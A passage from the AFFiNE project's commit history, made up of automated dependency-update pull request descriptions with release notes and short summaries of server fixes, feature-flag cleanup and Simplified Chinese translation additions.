`vite-plus/resolveConfig` for vite.config.ts ([#​22456](https://redirect.github.com/oxc-project/oxc/issues/22456)) (leaysgur) - [`2a60012`](https://redirect.github.com/oxc-project/oxc/commit/2a60012) linter/vue: Implement require-render-return rule ([#​22613](https://redirect.github.com/oxc-project/oxc/issues/22613)) (bab) - [`9f227fd`](https://redirect.github.com/oxc-project/oxc/commit/9f227fd) linter/vue: Implement no-deprecated-props-default-this rule ([#​21892](https://redirect.github.com/oxc-project/oxc/issues/21892)) (bab) - [`87f065e`](https://redirect.github.com/oxc-project/oxc/commit/87f065e) linter/vue: Implement return-in-emits-validator rule ([#​21935](https://redirect.github.com/oxc-project/oxc/issues/21935)) (bab) - [`ea0380c`](https://redirect.github.com/oxc-project/oxc/commit/ea0380c) linter/unicorn: Implement `import-style` rule ([#​22173](https://redirect.github.com/oxc-project/oxc/issues/22173)) (Hao Chen) - [`dde40fe`](https://redirect.github.com/oxc-project/oxc/commit/dde40fe) linter/vue: Implement no-watch-after-await rule ([#​22006](https://redirect.github.com/oxc-project/oxc/issues/22006)) (bab) - [`a735eb0`](https://redirect.github.com/oxc-project/oxc/commit/a735eb0) linter/vue: Implement valid-next-tick rule ([#​22531](https://redirect.github.com/oxc-project/oxc/issues/22531)) (bab) - [`6dc615d`](https://redirect.github.com/oxc-project/oxc/commit/6dc615d) linter/vue: Implement no-shared-component-data rule ([#​21842](https://redirect.github.com/oxc-project/oxc/issues/21842)) (bab) - [`a656418`](https://redirect.github.com/oxc-project/oxc/commit/a656418) linter/vue: Implement valid-define-options rule ([#​22107](https://redirect.github.com/oxc-project/oxc/issues/22107)) (bab) - [`bb6f1b2`](https://redirect.github.com/oxc-project/oxc/commit/bb6f1b2) linter/vue: Implement require-slots-as-functions rule ([#​22244](https://redirect.github.com/oxc-project/oxc/issues/22244)) (bab) - [`5fa4774`](https://redirect.github.com/oxc-project/oxc/commit/5fa4774) linter/n: Implement `callback-return` rule ([#​22470](https://redirect.github.com/oxc-project/oxc/issues/22470)) (Mikhail Baev) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDIuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIwMi4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
7a575a4a5b |
fix: hide experimental settings for doc and folder icons (#15021)
should fix #13955 The emoji doc and folder icons have been officially released with v0.25 but the experimental settings were still available with no effect if switched. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Feature flags for emoji folder and document icons are no longer user-configurable. <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15021?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
f5fc7c8c00 |
chore: bump up eslint-plugin-oxlint version to v1.67.0 (#15036)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint) | [`1.66.0` → `1.67.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.66.0/1.67.0) |  |  | --- ### Release Notes <details> <summary>oxc-project/eslint-plugin-oxlint (eslint-plugin-oxlint)</summary> ### [`v1.67.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.67.0) [Compare Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.66.0...v1.67.0) *No significant changes* ##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.66.0...v1.67.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
7d3e38d652 |
chore: bump up nestjs (#15035)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@nestjs-cls/transactional](https://papooch.github.io/nestjs-cls/) ([source](https://redirect.github.com/Papooch/nestjs-cls)) | [`3.2.0` → `3.2.1`](https://renovatebot.com/diffs/npm/@nestjs-cls%2ftransactional/3.2.0/3.2.1) |  |  | | [@nestjs-cls/transactional-adapter-prisma](https://papooch.github.io/nestjs-cls/) ([source](https://redirect.github.com/Papooch/nestjs-cls)) | [`1.3.4` → `1.3.5`](https://renovatebot.com/diffs/npm/@nestjs-cls%2ftransactional-adapter-prisma/1.3.4/1.3.5) |  |  | | [@nestjs/common](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common)) | [`11.1.23` → `11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.23/11.1.24) |  |  | | [@nestjs/core](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core)) | [`11.1.23` → `11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.23/11.1.24) |  |  | | [@nestjs/platform-express](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express)) | [`11.1.23` → `11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.23/11.1.24) |  |  | | [@nestjs/platform-socket.io](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io)) | [`11.1.23` → `11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.23/11.1.24) |  |  | | [@nestjs/websockets](https://redirect.github.com/nestjs/nest) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets)) | [`11.1.23` → `11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.23/11.1.24) |  |  | --- ### Release Notes <details> <summary>Papooch/nestjs-cls (@​nestjs-cls/transactional)</summary> ### [`v3.2.1`](https://redirect.github.com/Papooch/nestjs-cls/releases/tag/v3.2.1) [Compare Source](https://redirect.github.com/Papooch/nestjs-cls/compare/@nestjs-cls/transactional@3.2.0...@nestjs-cls/transactional@3.2.1) - fix: `has` method respects falsy values ([#​57](https://redirect.github.com/Papooch/nestjs-cls/issues/57)) [`69f06e7`](https://redirect.github.com/Papooch/nestjs-cls/commit/69f06e7) </details> <details> <summary>nestjs/nest (@​nestjs/common)</summary> ### [`v11.1.24`](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24) </details> <details> <summary>nestjs/nest (@​nestjs/core)</summary> ### [`v11.1.24`](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24) </details> <details> <summary>nestjs/nest (@​nestjs/platform-express)</summary> ### [`v11.1.24`](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24) </details> <details> <summary>nestjs/nest (@​nestjs/platform-socket.io)</summary> ### [`v11.1.24`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.24) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24) ##### v11.1.24 (2026-05-25) ##### Bug fixes - `core` - [#​17009](https://redirect.github.com/nestjs/nest/pull/17009) fix(core): reset dependency-tree cache on metadata changes ([@​puneetdixit200](https://redirect.github.com/puneetdixit200)) ##### Enhancements - `core` - [#​16997](https://redirect.github.com/nestjs/nest/pull/16997) feat(core): warn on late websocket adapter registration ([@​hbinhng](https://redirect.github.com/hbinhng)) ##### Dependencies - `platform-ws` - [#​17011](https://redirect.github.com/nestjs/nest/pull/17011) chore(deps): bump ws from 8.20.1 to 8.21.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot)) ##### Committers: 2 - Nguyễn Hải Bình ([@​hbinhng](https://redirect.github.com/hbinhng)) - Puneet Dixit ([@​puneetdixit200](https://redirect.github.com/puneetdixit200)) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
b05c387f96 |
fix(server): mail test & retry (#15044)
#### PR Dependency Tree * **PR #15044** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Stop sending notifications to disabled users; skip member invites when workspace names contain URLs/domains * Improve mail retry handling (per-recipient exhaustion, expiry, and cache cleanup) * Make many email headers/lead lines more generic and consistent * Fail-safe workspace content parsing to avoid crashes * **New Features** * 24-hour signup protection for sharing, invites, and invite-link creation * Job-queue: remove jobs by payload predicate * **Tests** * Expanded tests for mail jobs, SMTP hostname handling, payment checkout, job-queue removal, and abuse-detection utilities * Updated test fixtures to set createdAt timestamps for new users * **Chores** * Added required name input for test-email mutation * Database flush retry with deadlock detection/backoff <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15044?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
2bd920fea6 |
chore: bump up @inquirer/prompts version to v8 (#15025)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@inquirer/prompts](https://redirect.github.com/SBoudrias/Inquirer.js/blob/main/packages/prompts/README.md) ([source](https://redirect.github.com/SBoudrias/Inquirer.js)) | [`^7.10.1` → `^8.0.0`](https://renovatebot.com/diffs/npm/@inquirer%2fprompts/7.10.1/8.5.0) |  |  | --- ### Release Notes <details> <summary>SBoudrias/Inquirer.js (@​inquirer/prompts)</summary> ### [`v8.5.0`](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.3...5ca6d1101d5d3f8fb066cd5b389bccfdafbbe0c0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.3...@inquirer/prompts@8.5.0) ### [`v8.4.3`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.3) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.2...@inquirer/prompts@8.4.3) - Fix: Windows rendering bug - Fix: Preserve exact literal types in `choices` array (Typescript only) - Fix: Allow input `default` value to be of type `undefined` (Typescript only) - Bump dependencies ### [`v8.4.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.2) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.1...@inquirer/prompts@8.4.2) - Fix: some Windows terminals would freeze and not react to keypresses. ### [`v8.4.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.1) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.0...@inquirer/prompts@8.4.1) - Improve `expand` prompt type inferrence. ### [`v8.4.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.2...@inquirer/prompts@8.4.0) - Feat: Added a loading message while validating editor prompt input. - Type improvement: Better type inference with checkbox, search and expand prompts. - Fix: `editor` prompt not always properly handling editor path on windows. ### [`v8.3.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.2) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.1...@inquirer/prompts@8.3.2) - Fix broken 8.3.1 release process. ### [`v8.3.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.1) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.0...@inquirer/prompts@8.3.1) - Bump dependencies ### [`v8.3.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.2.1...@inquirer/prompts@8.3.0) - Fix: Keypresses happening before a prompt is rendered are now ignored. - Fix (checkbox): Element who're both checked and disabled are now always included in the returned array. - Feat (select/checkbox): Cursor will now hover disabled options of the list; but they still cannot be interacted with. This prevents the cursor jumping ahead in ways that can be confusing. - Feat: various new theme options to make all prompts content localizable. Finally, see our new [`@inquirer/i18n` package](https://redirect.github.com/SBoudrias/Inquirer.js/tree/main/packages/i18n)! ### [`v8.2.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.2.1) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.2.0...@inquirer/prompts@8.2.1) - chore: Switch `wrap-ansi` with `fast-wrap-ansi` ### [`v8.2.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.2.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.1.0...@inquirer/prompts@8.2.0) - feat(`search`): Add support for `default`. - feat(`rawlist`): Add support for `description` of choices. That information is displayed under the list when the choice is highlighted. - Bump dependencies ### [`v8.1.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.1.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.2...@inquirer/prompts@8.1.0) - Feat: `rawlist` now supports `default` option. - Fix: `select` now infer return type properly when passing a `choices` array of string literals. ### [`v8.0.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.0.2) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.1...@inquirer/prompts@8.0.2) - Fix Typescript not discovering types when `moduleResolution` is set to `commonjs` (you probably want to fix that in your project if it's still in your tsconfig) ### [`v8.0.1`](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.0...@inquirer/prompts@8.0.1) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.0...@inquirer/prompts@8.0.1) ### [`v8.0.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.0.0) [Compare Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@7.10.1...@inquirer/prompts@8.0.0) ### Release Notes #### 🚨 Breaking Changes This is a major release that modernizes the codebase for Node.js ≥ 20. ##### ESM Only - No More CommonJS Support **Impact:** All packages are now ESM-only. CommonJS imports are no longer supported. If you're on modern Node versions (≥ 20), this should be transparent and have no impact. ##### Node.js Version Requirement **Minimum Node.js version is now 20.x** Node.js versions below 20 are no longer supported. Please upgrade to Node.js 20 or later. Node min versions: `>=23.5.0 || ^22.13.0 || ^21.7.0 || ^20.12.0` ##### Deprecated APIs Removed The following deprecated APIs have been removed after being deprecated in previous releases: ##### `list` prompt alias removed (affects `inquirer` package only) The `list` alias has been removed from the `inquirer` package. This only impacts users of the legacy `inquirer` package, not users of `@inquirer/prompts` or individual prompt packages. ```js // ❌ No longer available (inquirer package only) import inquirer from 'inquirer'; const answer = await inquirer.prompt([ { type: 'list', name: 'choice', message: 'Pick one:', choices: ['a', 'b'] } ]); // ✅ Use 'select' instead import inquirer from 'inquirer'; const answer = await inquirer.prompt([ { type: 'select', name: 'choice', message: 'Pick one:', choices: ['a', 'b'] } ]); ``` ##### `helpMode` theme property removed ```js // ❌ No longer available const answer = await select({ theme: { helpMode: 'never' } }); // ✅ Use theme.style.keysHelpTip instead const answer = await select({ theme: { style: { keysHelpTip: () => undefined // or your custom styling function } } }); ``` This affects the following prompts: - `@inquirer/checkbox` - `@inquirer/search` - `@inquirer/select` ##### `instructions` config property removed ```js // ❌ No longer available const answer = await checkbox({ instructions: 'Custom instructions' }); // ✅ Use theme.style.keysHelpTip instead const answer = await checkbox({ theme: { style: { keysHelpTip: (text) => 'Custom instructions' } } }); ``` This affects the following prompts: - `@inquirer/checkbox` - `@inquirer/search` - `@inquirer/select` ##### `cancel()` method removed The `cancel()` method on prompt return custom `Promise` has been removed. ```js // ❌ No longer available const answerPromise = input({ message: 'Name?' }); answerPromise.cancel(); const answer = await answerPromise; // ✅ Use AbortSignal instead const controller = new AbortController(); const answer = await input( { message: 'Name?' }, { signal: controller.signal } ); controller.abort(); ``` ##### Color Library Change: yoctocolors → Node.js `styleText` **Internal change:** The project now uses Node.js built-in `util.styleText()` instead of the `yoctocolors` package for terminal colors. This makes Inquirer smaller and reduces risks of vulnerabilities coming from transitive dependencies. </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>v2026.5.28-canary.1026 |
||
|
|
b3b9c54a89 |
chore: bump up @types/nodemailer version to v8 (#15026)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/nodemailer](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/nodemailer) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/nodemailer)) | [`^7.0.0` → `^8.0.0`](https://renovatebot.com/diffs/npm/@types%2fnodemailer/7.0.9/8.0.0) |  |  | --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xOTQuMCIsInVwZGF0ZWRJblZlciI6IjQzLjE5NC4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
1d08e1d8c0 |
fix(server): dirty data handle (#15034)
#### PR Dependency Tree * **PR #15034** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Refactor** * Consolidated subscription visibility and “active” selection logic so all subscription queries use a shared, consistent filter across the platform. * **Tests** * Added a test to ensure expired subscriptions are excluded from active subscription results. * Updated test fixtures to differentiate expired, unexpired, and onetime subscriptions for more accurate coverage. <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15034?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
66a6a5fffc |
feat(i18n): add missing zh-Hans translations (#15032)
## Summary This PR completes the missing Simplified Chinese (`zh-Hans`) i18n resource coverage. The current i18n completeness calculation is based on key coverage between `en.json` and each locale resource file. Before this change, `zh-Hans.json` contained 2331 keys while `en.json` contained 2406 keys, resulting in a displayed completeness of 97%. This change adds the 75 missing `zh-Hans` translation entries and updates the generated completeness value for `zh-Hans` from 97% to 100%. ## Changes - Added 75 missing Simplified Chinese translations to `packages/frontend/i18n/src/resources/zh-Hans.json`. - Updated `packages/frontend/i18n/src/i18n-completenesses.json` so `zh-Hans` now reports 100% completeness. - Kept the scope limited to missing i18n resource keys only. ## Notes This PR does not modify existing `zh-Hans` translations, terminology choices, or hardcoded English UI strings outside the i18n resource files. ## Verification - Confirmed `zh-Hans.json` parses successfully. - Confirmed `zh-Hans.json` now has full key coverage against `en.json`. - Confirmed missing key count is 0. - Confirmed computed `zh-Hans` completeness is 100%. - Ran pre-commit checks: - `yarn lint-staged` - `yarn lint:ox` <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Completed Chinese (Simplified) translations with 100% coverage for the application. * Added new translations across multiple areas: appearance and image settings, export functionality, document import from Bear and Obsidian, analytics and viewer information, editor settings including auto-date titles and icon options, workspace sharing controls, calendar integration with CalDAV support, share menu tooltips, and comprehensive error messages. <!-- review_stack_entry_start --> [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15032?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack) <!-- review_stack_entry_end --> <!-- end of auto-generated comment: release notes by coderabbit.ai --> |